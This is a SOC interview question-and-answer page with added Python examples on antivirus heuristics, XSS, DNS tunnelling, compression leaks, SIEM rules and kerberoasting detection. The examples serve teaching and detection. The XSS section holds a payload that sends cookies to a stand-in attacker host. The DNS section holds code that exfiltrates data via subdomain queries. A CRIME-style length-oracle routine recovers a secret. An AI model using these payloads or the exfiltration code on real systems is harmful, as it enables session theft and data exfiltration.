SOC Interview Questions
If you're looking at the SIEM and see a single IP hit multiple endpoints, what would that suggest?
Most likely reconnaissance from that IP, such as a host sweep or port scan: one source touching many destinations (or many ports on one destination) in a short window. Check it against the baseline before escalating, because vulnerability scanners, monitoring systems and backup servers legitimately fan out in the same way.
What is a 0-day?
A vulnerability the vendor does not know about (or knows about but has not yet patched), or an exploit for such a vulnerability; the name refers to the vendor having had zero days to fix it. Such exploits are often discovered and kept secret as a tool rather than being disclosed.
What happens when you access google.com?
1 - Assuming the IP address of google.com is not already cached (browser cache, OS resolver cache or the hosts file), the OS resolver sends a DNS query for the name, usually to a recursive resolver, and gets back an A/AAAA record.
2 - The browser opens a TCP connection to that IP on port 443 (HTTPS) using the 3-way handshake (SYN, SYN-ACK, ACK).
3 - A TLS handshake runs over that connection: the server presents its certificate, the browser validates it against its trust store, and both sides agree on session keys.
4 - Inside the TLS session the browser sends an HTTP GET request for / with a Host: header.
5 - Google's servers respond with a status line, headers and the HTML body.
6 - The browser parses the HTML, fetches any referenced resources (each with the same steps) and renders the page.
What port is telnet and why shouldn't it be used?
23. It lets a user log in to a remote host, but everything, including the username and password, is sent in cleartext, so anyone on the path can eavesdrop on or hijack the session. Use SSH (port 22) instead.
What is Active Directory?
Active Directory provides a centralised directory and control point for network administration and security (users, computers, groups and policies). Server computers configured with Active Directory are known as domain controllers. Active Directory stores all information and settings for a deployment in a central database, and allows administrators to assign policies (Group Policy) and deploy and update software.
How does antivirus software recognize new viruses and worms?
By matching known virus signatures (file hashes or characteristic byte patterns), by heuristic analysis of suspicious code features and behaviour, and on modern products by behavioural/sandbox monitoring and cloud reputation. Only the heuristic and behavioural methods can catch a genuinely new sample, and they are the ones that produce false positives.
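The difference between the two approaches, as an added example that is not from the original page: the constructed samples below are harmless byte strings, the family name is hypothetical, and the detectors are deliberately simple. A hash signature only catches the exact file, a byte pattern catches a re-packed variant that still carries the string, and only the heuristic (entropy plus suspicious API names) catches the variant where the string is gone.

```python
import hashlib
import math
import re
from collections import Counter


def _blob(seed: bytes, n_blocks: int) -> bytes:
    """Deterministic pseudo-random bytes standing in for a packed or encrypted payload section."""
    return b"".join(hashlib.sha256(seed + bytes([i])).digest() for i in range(n_blocks))


# Constructed samples: not real malware, just bytes with the properties the detectors look at.
KNOWN_BAD = b"MZ\x90\x00" + b"powershell -nop -w hidden -enc SQBFAFgA" + _blob(b"a", 32)
VARIANT_A = b"MZ\x90\x00" + b"powershell -nop -w hidden -enc SQBFAFgA" + _blob(b"b", 32)  # re-packed: new hash, same string
VARIANT_B = b"MZ\x90\x00" + b"VirtualAlloc\x00CreateRemoteThread\x00" + _blob(b"c", 32)    # string gone, still packed and injecting
BENIGN = b"MZ\x90\x00" + b"This program cannot be run in DOS mode. Hello, world!\r\n" * 40

# Signature database built from samples already analysed (hypothetical family name)
HASH_SIGNATURES = {hashlib.sha256(KNOWN_BAD).hexdigest(): "Trojan.Demo.A"}
PATTERN_SIGNATURES = {b"powershell -nop -w hidden -enc": "Trojan.Demo.A (pattern)"}

# Heuristic features: API names typical of process injection and encoded command lines
SUSPICIOUS_TOKENS = re.compile(rb"VirtualAlloc|CreateRemoteThread|WriteProcessMemory|EncodedCommand|-enc ", re.IGNORECASE)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; packed or encrypted content sits near 8, plain code and text much lower."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def signature_match(sample: bytes):
    """Signature detection: exact hash first, then known byte patterns. Misses anything not seen before."""
    name = HASH_SIGNATURES.get(hashlib.sha256(sample).hexdigest())
    if name:
        return name
    for pattern, name in PATTERN_SIGNATURES.items():
        if pattern in sample:
            return name
    return None


def heuristic_score(sample: bytes) -> int:
    """Heuristic detection: add points for suspicious properties instead of looking for a known sample."""
    score = 2 if shannon_entropy(sample) > 7.0 else 0
    score += len({m.group(0).lower() for m in SUSPICIOUS_TOKENS.finditer(sample)})
    return score


def classify(sample: bytes, threshold: int = 3) -> str:
    name = signature_match(sample)
    if name:
        return f"known: {name}"
    score = heuristic_score(sample)
    return f"suspicious (heuristic score {score})" if score >= threshold else "clean"
```

The threshold is where the false-positive trade-off lives: a legitimate installer that is packed and calls VirtualAlloc would score the same as VARIANT_B, which is why real products combine this with reputation and behaviour data.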
Compress or encrypt first?
Compress, then encrypt. Good ciphertext is indistinguishable from random data and therefore does not compress, so compressing after encryption gains nothing; compressing first reduces the amount of data that has to be encrypted and transmitted. Caveat: because the compressed length depends on the plaintext, compressing attacker-influenced data together with a secret before encrypting leaks that secret through the ciphertext length (the CRIME and BREACH attacks on TLS and HTTP compression), so secrets should not be compressed alongside untrusted input.
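Both halves of that answer, as an added example that is not part of the original page. The stream cipher is a stand-in built from SHA-256 in counter mode with a hypothetical demo key (chosen so the example runs offline; a real system would use a proper cipher and never reuse key and nonce), the plaintexts are constructed, and the second part shows the caveat: when a secret cookie and attacker-controlled input are compressed together, a length oracle recovers the secret one character at a time.

```python
import hashlib
import zlib

# Hypothetical demo key; the same key/nonce is reused for every message here, which a real
# stream cipher must never do, but only ciphertext *lengths* matter for what this shows.
KEY = b"demo-key-not-for-real-use"
NONCE = b"\x00" * 12


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """SHA-256 in counter mode as a stand-in stream cipher keystream (demo construction, not a real cipher)."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + block.to_bytes(8, "big")).digest()
        block += 1
    return bytes(out[:length])


def encrypt(data: bytes) -> bytes:
    """XOR with the keystream; ciphertext is the same length as the input, so length is visible on the wire."""
    return bytes(a ^ b for a, b in zip(data, keystream(KEY, NONCE, len(data))))


def compress_then_encrypt(plaintext: bytes) -> bytes:
    return encrypt(zlib.compress(plaintext, 9))


def encrypt_then_compress(plaintext: bytes) -> bytes:
    return zlib.compress(encrypt(plaintext), 9)


def roundtrip(plaintext: bytes) -> bytes:
    """Decrypt (XOR is its own inverse) and decompress a compress-then-encrypt message."""
    return zlib.decompress(encrypt(compress_then_encrypt(plaintext)))


# Constructed, highly repetitive plaintext, the kind of thing logs and HTML are.
SAMPLE = b'{"user":"alice","action":"login","result":"ok"}\n' * 50


# The caveat: compressing a secret together with attacker-controlled data leaks the secret via length.

def response_page(secret: bytes, reflected: bytes) -> bytes:
    """Constructed response body: a secret cookie value next to input the attacker controls."""
    return b"sid=" + secret + b"; HttpOnly\nq=" + reflected + b"\n"


def observed_length(secret: bytes, reflected: bytes) -> int:
    """What a passive network observer sees: the size of the compressed-then-encrypted response."""
    return len(compress_then_encrypt(response_page(secret, reflected)))


def recover_secret(oracle, length: int, alphabet: bytes = b"0123456789") -> bytes:
    """CRIME/BREACH-style attack: a guess that extends the known prefix of the secret is absorbed
    into the LZ77 back-reference for 'sid=<secret>' and compresses one byte shorter than wrong guesses."""
    known = b""
    for _ in range(length):
        sizes = {bytes([c]): oracle(b"sid=" + known + bytes([c])) for c in alphabet}
        known += min(sizes, key=sizes.get)
    return known


if __name__ == "__main__":
    print("plaintext:", len(SAMPLE), "compress-then-encrypt:", len(compress_then_encrypt(SAMPLE)),
          "encrypt-then-compress:", len(encrypt_then_compress(SAMPLE)))
    print("recovered:", recover_secret(lambda r: observed_length(b"7391", r), 4))
```

The oracle works because zlib emits a back-reference to the earlier `sid=7391` for the reflected `sid=` plus guess; a correct digit extends the match by one byte instead of costing a literal. The secret and prefix are kept short enough that DEFLATE uses fixed Huffman codes with no extra length bits, which makes the one-byte difference deterministic here; real attacks against longer secrets deal with noise by repeating and aligning measurements.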
What's XSS attack?
A cross-site scripting attack is when an attacker injects script (usually JavaScript) into a page that other users load, so it runs in their browsers with their session: stealing cookies, performing actions as them, or spreading further. It can be stored (saved on the server and served to everyone), reflected (bounced back from a crafted link) or DOM-based (introduced by client-side code). Example: the Samy worm (2005) used a stored XSS in MySpace profiles to add Samy as a friend and copy itself to each viewer's profile, reaching over a million users within a day and forcing MySpace offline to clean up.
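The vulnerable pattern next to its fix, as an added example that is not from the original page: the payload is constructed in the spirit of the Samy worm (a script that ships the viewer's cookie to a hypothetical attacker.example host), and the rendering functions are illustrative server-side templates, not code from MySpace or any framework.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker input: script that sends the viewer's cookie to a hypothetical collector
PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'


def render_unsafe(display_name: str) -> str:
    """Vulnerable: untrusted data concatenated straight into HTML, so tags in it become live markup."""
    return f'<div class="profile"><h1>About {display_name}</h1></div>'


def render_safe(display_name: str) -> str:
    """Hardened: HTML-escape untrusted data for the element context it lands in (&, <, >, quotes)."""
    return f'<div class="profile"><h1>About {html.escape(display_name, quote=True)}</h1></div>'


def safe_href(url: str) -> str:
    """URL attribute context needs two things: escaping, so the value cannot break out of the attribute,
    and scheme validation, because escaping alone does nothing against javascript: URLs."""
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">profile</a>'


def contains_live_script(rendered: str) -> bool:
    """Crude check for the demo: does a real <script> tag survive into the output?"""
    return "<script" in rendered.lower()
```

Escaping is context-specific: what is safe inside an element is not enough inside an attribute, a URL, or a JavaScript block, which is why template engines that auto-escape per context (and a Content-Security-Policy as a backstop) beat hand-rolled escaping.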
Which is more secure open source or closed source?
It definitely depends on the context and who is actually working on the product. I think software that is actively maintained would be the most secure option.
What is DNS? DNS Tunneling?
The Domain Name System is effectively the phonebook of the internet: it translates human-readable names such as google.com into IP addresses so that hosts can connect, mostly over UDP port 53 (TCP 53 for large responses and zone transfers). DNS tunneling takes advantage of the fact that DNS is almost always allowed outbound and rarely inspected: data is encoded into the subdomain labels of queries for a domain the attacker controls, and commands or files come back in the responses, so malicious files get in and data gets out without detection. Tell-tale signs are long, high-entropy subdomains, many unique queries to a single domain and unusual record types such as TXT.
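Both ends of a tunnel and the detection that catches it, as an added example that is not from the original page: the zone c2.example, the benign query log and the exfiltrated bytes are all constructed, and the detector treats the last two labels as the registered domain (a real one would use the public suffix list).

```python
import base64
import hashlib
import math
from collections import defaultdict

TUNNEL_DOMAIN = "c2.example"    # hypothetical attacker-controlled zone

# Constructed data to exfiltrate (pseudo-random bytes standing in for a stolen file)
SECRET = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(7))

# Constructed benign queries as they would appear in a resolver log
BENIGN_QUERIES = ["www.google.com", "mail.google.com", "ssl.gstatic.com", "api.github.com",
                  "cdn.example.net", "www.google.com", "ntp.ubuntu.com"] * 3


def tunnel_queries(data: bytes, domain: str, chunk: int = 30) -> list:
    """Sender side: base32-encode the data and spread it over subdomain labels, one chunk per query.
    A leading sequence label lets the receiver reorder; labels stay under the 63-character limit."""
    enc = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    chunks = [enc[i:i + chunk] for i in range(0, len(enc), chunk)]
    return [f"{n}.{c}.{domain}" for n, c in enumerate(chunks)]


def reassemble(queries, domain: str) -> bytes:
    """Receiver side (the authoritative server for `domain`): reorder the chunks and decode."""
    parts = {}
    for q in queries:
        labels = q.split(".")
        if ".".join(labels[-2:]) == domain:
            parts[int(labels[0])] = labels[1]
    enc = "".join(parts[i] for i in sorted(parts)).upper()
    return base64.b32decode(enc + "=" * (-len(enc) % 8))


def shannon_entropy(s: str) -> float:
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def detect_tunnels(queries, min_unique=5, min_len=20, min_entropy=3.0) -> dict:
    """Defender side: per zone, count unique subdomains and measure their length and entropy.
    Assumption: the registered domain is the last two labels (no public suffix list here)."""
    by_zone = defaultdict(set)
    for q in queries:
        labels = q.lower().strip(".").split(".")
        by_zone[".".join(labels[-2:])].add(".".join(labels[:-2]))
    flagged = {}
    for zone, subs in by_zone.items():
        subs.discard("")
        if len(subs) < min_unique:
            continue
        avg_len = sum(len(s) for s in subs) / len(subs)
        avg_entropy = sum(shannon_entropy(s) for s in subs) / len(subs)
        if avg_len >= min_len and avg_entropy >= min_entropy:
            flagged[zone] = {"unique": len(subs), "avg_len": round(avg_len, 1),
                             "avg_entropy": round(avg_entropy, 2)}
    return flagged


# Constructed resolver log: normal traffic with the tunnel mixed in
QUERIES = BENIGN_QUERIES + tunnel_queries(SECRET, TUNNEL_DOMAIN)
```

The thresholds are deliberately loose for a few dozen log lines; in production they are set from the baseline of the environment, and CDNs and some security products also generate long, machine-looking labels, so the zone's reputation and query volume need to be weighed in before alerting.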
What is the primary goal of cybersecurity / informational security?
To enable the company to succeed at what it does, not to set up roadblocks that impede its processes. Infosec is about understanding and mitigating the risks a company faces (to the confidentiality, integrity and availability of its data and systems) at a cost proportionate to those risks.
How do you stay up-to-date with cybersecurity news?
Follow specific subreddits and some handles on Twitter, enjoy the Darknet Diaries podcast and attend live-stream study groups on YouTube.
What is HTTP?
Hypertext Transfer Protocol, the request/response protocol that clients (browsers) use to talk to web servers. Two common methods: GET requests data from the server, and POST sends data to the server to create or update a resource. Plain HTTP uses port 80; HTTPS is HTTP inside a TLS session on port 443.
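The bytes behind the google.com walkthrough above and this HTTP answer, as an added example that is not from the original page: one function serializes the request the browser writes into its (TLS-wrapped) TCP socket, the other parses a constructed response, including chunked framing and repeated headers. The sample response and hostnames are made up, and the decision to reject a response that carries both Content-Length and Transfer-Encoding is this example's strict policy, chosen because that ambiguity is what request-smuggling attacks exploit.

```python
def build_request(method: str, host: str, path: str = "/", body: bytes = b"", extra_headers=None) -> bytes:
    """Serialize an HTTP/1.1 request exactly as it is written to the (TLS-wrapped) TCP socket."""
    headers = {"Host": host, "Connection": "close"}
    if body:
        headers["Content-Type"] = "application/x-www-form-urlencoded"
        headers["Content-Length"] = str(len(body))
    headers.update(extra_headers or {})
    head = "\r\n".join([f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers.items()])
    return head.encode("ascii") + b"\r\n\r\n" + body


def _decode_chunked(data: bytes) -> bytes:
    """Transfer-Encoding: chunked body: hex size line, chunk, CRLF, repeated until a zero-size chunk."""
    out = bytearray()
    while True:
        size_line, _, data = data.partition(b"\r\n")
        size = int(size_line.split(b";")[0].strip(), 16)   # chunk extensions after ';' are ignored
        if size == 0:
            return bytes(out)
        out += data[:size]
        data = data[size + 2:]   # step over the chunk and its trailing CRLF


def parse_response(raw: bytes):
    """Parse status line, headers and body into (status, headers, body). Header names are lower-cased
    and values kept as lists so repeated headers such as Set-Cookie are not merged into one string."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete response head")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    version, code, *_ = status_line.split(" ", 2)
    if not version.startswith("HTTP/"):
        raise ValueError("bad status line")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    chunked = any("chunked" in v.lower() for v in headers.get("transfer-encoding", []))
    if chunked and "content-length" in headers:
        # Two framing mechanisms at once is the ambiguity behind request smuggling; refuse rather than guess.
        raise ValueError("ambiguous framing: both Transfer-Encoding and Content-Length")
    if chunked:
        body = _decode_chunked(rest)
    elif "content-length" in headers:
        body = rest[: int(headers["content-length"][0])]
    else:
        body = rest   # no framing: body runs until the server closes the connection
    return int(code), headers, body


# Constructed response, the kind of thing that comes back for GET /
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Set-Cookie: NID=abc; Secure; HttpOnly\r\n"
    b"Set-Cookie: pref=1\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"6\r\n<html>\r\n"
    b"7\r\n</html>\r\n"
    b"0\r\n\r\n"
)
```

DNS resolution, the TCP handshake and TLS are all handled below this layer by the OS and the TLS library; what the application protocol itself consists of is just these lines of text and the framing rules for the body.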
What's the difference between an IDS and IPS?
IDS, Intrusion Detection System: only detects and alerts, does not block. IPS, Intrusion Prevention System: sits inline and automatically drops or blocks malicious traffic. Pros/cons: an IPS prevents attacks but is harder to tune (a false positive blocks legitimate traffic, and the inline device adds latency and a point of failure) and can hamper threat hunting, because blocking tells the intruder they have been detected; an IDS never breaks traffic and lets analysts watch an attacker, but it only helps if someone acts on the alert.
Why are preventative controls better than detective controls?
IPS vs IDS again. Preventative controls require more tuning and a false positive blocks legitimate activity, but they stop the attack from succeeding. Detective controls require more eyes and effort and are prone to human error, but they allow one to monitor a threat actor and learn their tradecraft. Neither is strictly better; a mature control set layers both.
Steps to prevent data loss?
Data loss here is an availability problem. Plan for 1) redundant resources that remove single points of failure: backups that are stored safely (offline or immutable copies, with restores tested regularly) and RAID to survive hard drive failures, and 2) a business continuity plan with policies in place (who is in charge, recovery time and recovery point objectives, testing of backups). Note that RAID is not a backup: it survives a failed disk, not deletion, ransomware or the loss of a site.
What's the difference between TCP and UDP?
TCP, Transmission Control Protocol, is connection-oriented: it uses the 3-way handshake (SYN, SYN-ACK, ACK) to establish a connection before sending data, then numbers, acknowledges and retransmits segments so they arrive complete and in order; e.g. HTTP, SSH, email. UDP, User Datagram Protocol, just sends datagrams with no connection setup, ordering or retransmission, which makes it lighter and faster; e.g. DNS, streaming or online video games, where a late packet is useless anyway.
What are the steps you would take to secure a server?
Operational: train staff, apply the concept of least privilege so that nobody has unnecessary access, enforce a strong password policy with MFA, and have contingency plans. Technical: harden the OS (disable unused services, patch promptly, restrict SSH/RDP management access to admin networks), firewalls, IPS/IDS, endpoint protection, and a SIEM for log collection, detection and monitoring. Physical: controls like mantraps and locked racks.
If you see multiple IP's hit a single endpoint, what would that suggest is happening?
Possibly a DoS/DDoS attack such as a ping or SYN flood, or a distributed brute-force against a login endpoint. Of course it depends on context and on what is considered baseline for that endpoint: a public web server normally sees many IPs, an internal management port does not.
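The two SIEM patterns from this page (one source hitting many endpoints, many sources hitting one endpoint) as detection logic over sample logs, added here as an example that is not from the original page. The firewall-style log lines are constructed, the thresholds and windows are illustrative, and the field order is an assumption about the log format.

```python
from collections import Counter, defaultdict
from typing import NamedTuple


class Event(NamedTuple):
    ts: int
    src: str
    dst: str
    port: int
    action: str


# Constructed firewall-style log lines: "<epoch> <src> -> <dst>:<port> <action>"
T = 1700000000
LOG_LINES = (
    [f"{T + i} 10.0.0.5 -> 10.0.1.{i + 1}:22 deny" for i in range(25)]                        # one source sweeping 25 hosts
    + [f"{T + 100 + i // 10} 198.51.100.{i + 1} -> 10.0.1.50:443 allow" for i in range(30)]   # 30 sources on one endpoint in 3 s
    + [f"{T + 10 * i} 10.0.0.7 -> 10.0.1.10:443 allow" for i in range(20)]                    # normal client chatter
    + [f"{T + 7 * i} 10.0.0.8 -> 10.0.1.11:53 allow" for i in range(20)]
)


def parse(lines) -> list:
    events = []
    for line in lines:
        ts, src, _, target, action = line.split()
        dst, port = target.rsplit(":", 1)
        events.append(Event(int(ts), src, dst, int(port), action))
    return events


def burst_fanout(events, key, value, window: int, threshold: int) -> dict:
    """For each key (e.g. a source IP) count distinct values (e.g. destinations) inside a sliding window of
    `window` seconds; return {key: max distinct count} for keys that reach `threshold`."""
    groups = defaultdict(list)
    for e in events:
        groups[key(e)].append((e.ts, value(e)))
    hits = {}
    for k, items in groups.items():
        items.sort()
        in_window = Counter()
        lo = 0
        for ts, v in items:
            in_window[v] += 1
            while ts - items[lo][0] > window:       # drop events that fell out of the window
                old = items[lo][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            if len(in_window) >= threshold:
                hits[k] = max(hits.get(k, 0), len(in_window))
    return hits


def find_scanners(events, window: int = 60, min_targets: int = 10) -> dict:
    """Fan-out: one source, many distinct (host, port) targets => host sweep or port scan."""
    return burst_fanout(events, key=lambda e: e.src, value=lambda e: (e.dst, e.port),
                        window=window, threshold=min_targets)


def find_flooded(events, window: int = 10, min_sources: int = 20) -> dict:
    """Fan-in: one endpoint, many distinct sources in a short window => flood or distributed brute force."""
    return burst_fanout(events, key=lambda e: f"{e.dst}:{e.port}", value=lambda e: e.src,
                        window=window, threshold=min_sources)
```

The same sliding-window primitive serves both questions; only the grouping key changes. In practice the thresholds come from the baseline, and a list of known scanners (the vulnerability scanner, monitoring hosts) is excluded from the fan-out rule so the alert stays useful.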
Describe AAA
Protocols and frameworks that provide authentication (who you are), authorization (what you are allowed to do) and accounting (a record of what you did); e.g. RADIUS, TACACS+ and Diameter for network and remote access.
What is the OSI model?
The Open Systems Interconnection model: a seven-layer (physical, data link, network, transport, session, presentation, application) standardized way of understanding how applications communicate over a network. It is often used as a troubleshooting ladder: for example Layer 1 would be cables, Layer 2 switching and MAC addresses, Layer 3 IP routing, Layer 4 TCP/UDP ports and Layer 7 the application protocol such as HTTP.
Explain in your words, what is a data leak?
Sensitive, proprietary or private information ends up accessible to those who do not have the proper authorization, whether through a malicious insider or outsider, or simply through misconfiguration or accident (an open storage bucket, a misaddressed email).
What is the purpose of subnetting and why is it used?
Subnetting divides a large address block into smaller networks (Layer 3), similar in purpose to a VLAN, which segments at Layer 2. It makes addressing and routing more efficient, keeps broadcast traffic within each subnet, and, because traffic between subnets has to pass through a router or firewall, it allows the network to be segmented so that only authorized hosts can reach particular resources (e.g. separating user workstations from servers and management networks).
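The subnet arithmetic and the segmentation idea in code, as an added example that is not from the original page. The 10.20.0.0/16 site block, the three segments and the allow-list between them are hypothetical; the point is that hosts in the same subnet talk directly, while traffic between subnets crosses the router or firewall, which is where the policy is enforced.

```python
import ipaddress

SITE = ipaddress.ip_network("10.20.0.0/16")   # hypothetical site allocation

# Hypothetical segments carved from SITE
SEGMENTS = {
    "users": ipaddress.ip_network("10.20.1.0/24"),
    "servers": ipaddress.ip_network("10.20.10.0/24"),
    "management": ipaddress.ip_network("10.20.250.0/28"),
}

# Which segment may initiate connections to which; anything not listed is denied at the router/firewall
POLICY = {
    ("users", "servers"),
    ("management", "servers"),
    ("management", "users"),
}


def carve(site: ipaddress.IPv4Network, new_prefix: int) -> list:
    """Split a block into equal subnets, e.g. a /16 into 256 /24s."""
    return list(site.subnets(new_prefix=new_prefix))


def summarize(net: ipaddress.IPv4Network) -> tuple:
    """Network address, broadcast address and usable host count for a subnet."""
    usable = net.num_addresses - 2 if net.prefixlen < 31 else net.num_addresses
    return str(net.network_address), str(net.broadcast_address), usable


def segment_of(ip: str):
    addr = ipaddress.ip_address(ip)
    for name, net in SEGMENTS.items():
        if addr in net:
            return name
    return None


def allowed(src_ip: str, dst_ip: str) -> bool:
    """Same subnet: the hosts talk directly and no router is in the path to enforce anything.
    Different subnets: the traffic crosses the router/firewall, which applies POLICY."""
    src, dst = segment_of(src_ip), segment_of(dst_ip)
    if src is None or dst is None:
        return False
    return src == dst or (src, dst) in POLICY
```

The same-subnet shortcut is the security caveat of subnetting: a compromised workstation can reach every other host in its /24 without any policy being consulted, which is why host firewalls or private VLANs are still needed inside a segment.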
What is kerberoasting?
A post-compromise technique used for privilege escalation and lateral movement once an attacker already has a foothold in the domain. Any authenticated domain user can request a Kerberos service ticket (TGS) for any account that has a service principal name; that ticket is encrypted with the service account's password hash, so the attacker extracts it from memory or from the network and cracks it offline with password-cracking tools such as John the Ripper or Hashcat, then logs in as the service account. Best mitigations: long, random passwords for service accounts (or group managed service accounts, which rotate them automatically), configuring those accounts for AES rather than RC4 encryption, and alerting on bursts of TGS requests (event ID 4769) for many services or with the RC4 encryption type (0x17).
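The detection side of that answer as an added example, not from the original page: a rule over constructed Windows event 4769 (Kerberos service ticket requested) records. Field names follow the event's XML (TargetUserName, ServiceName, TicketEncryptionType, IpAddress, Status); the usernames, services and timestamps are made up, and the window and threshold are illustrative.

```python
from collections import defaultdict

RC4_HMAC = 0x17   # TicketEncryptionType for RC4-HMAC; AES128 is 0x11 and AES256 is 0x12

# Constructed 4769 records (field names as in the event XML; values are made up)
BASE = 1700000000
EVENTS = [
    {"time": BASE + 5, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "FS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.41", "Status": "0x0"},
    {"time": BASE + 9, "TargetUserName": "WS123$@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.123", "Status": "0x0"},
] + [
    {"time": BASE + 100 + i * 3, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": svc,
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.23", "Status": "0x0"}
    for i, svc in enumerate(["svc_sql", "svc_web", "svc_backup", "svc_sccm",
                             "svc_exchange", "svc_report", "svc_vmware", "svc_sap"])
] + [
    {"time": BASE + 200, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.77", "Status": "0x0"},
]


def is_roastable(service: str) -> bool:
    """Machine accounts (names ending in $) and krbtgt have long random passwords that will not crack,
    so a Kerberoaster goes after user-type service accounts."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def kerberoast_candidates(events, window: int = 300, min_services: int = 5) -> dict:
    """Users who obtained RC4 service tickets for many distinct roastable accounts within `window` seconds:
    the burst a tool produces when it requests a ticket for every SPN in the domain at once."""
    per_user = defaultdict(list)
    for e in events:
        if e["Status"] != "0x0" or int(e["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        if not is_roastable(e["ServiceName"]):
            continue
        per_user[e["TargetUserName"]].append((e["time"], e["ServiceName"], e["IpAddress"]))
    hits = {}
    for user, reqs in per_user.items():
        reqs.sort()
        services = sorted({s for _, s, _ in reqs})
        span = reqs[-1][0] - reqs[0][0]
        if len(services) >= min_services and span <= window:
            hits[user] = {"services": services, "seconds": span, "source": reqs[0][2]}
    return hits


def rc4_service_requests(events) -> list:
    """Weaker but still useful signal: any RC4 ticket for a roastable account, since current Windows
    clients negotiate AES and an RC4 request usually means the attacker asked for it explicitly."""
    return sorted({(e["TargetUserName"], e["ServiceName"]) for e in events
                   if int(e["TicketEncryptionType"], 16) == RC4_HMAC and is_roastable(e["ServiceName"])})
```

The strong signal is the burst (eight different services from one user in twenty seconds); the RC4 rule on its own also fires on bob's single request, which may be an old client, so it is better as an enrichment or a low-severity alert than a page-out.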
What is a vulnerability? Threat? Risk
Vuln = a weakness in anything: software, hardware, people, process. Threat = any actor or event that could take advantage of a vuln. Risk = the combination of the likelihood that a threat exploits a vulnerability and the impact if it does (risk = likelihood x impact). Talk about the difficulty of quantifying the cost of cyber risks, which makes it hard to get buy-in from stakeholders.
Have you had any experience in debugging?
Yes. Talk about Proxmox VMs, but essentially I would take a systematic approach, like using the OSI model or comparing normal function with function after a change. Also, I would write notes about what I've tried, the different resources used and what worked.
Basic Linux Commands?
cd - change directory, ls - list files, mkdir - make directory, chmod - change permissions, grep - search files for a regular expression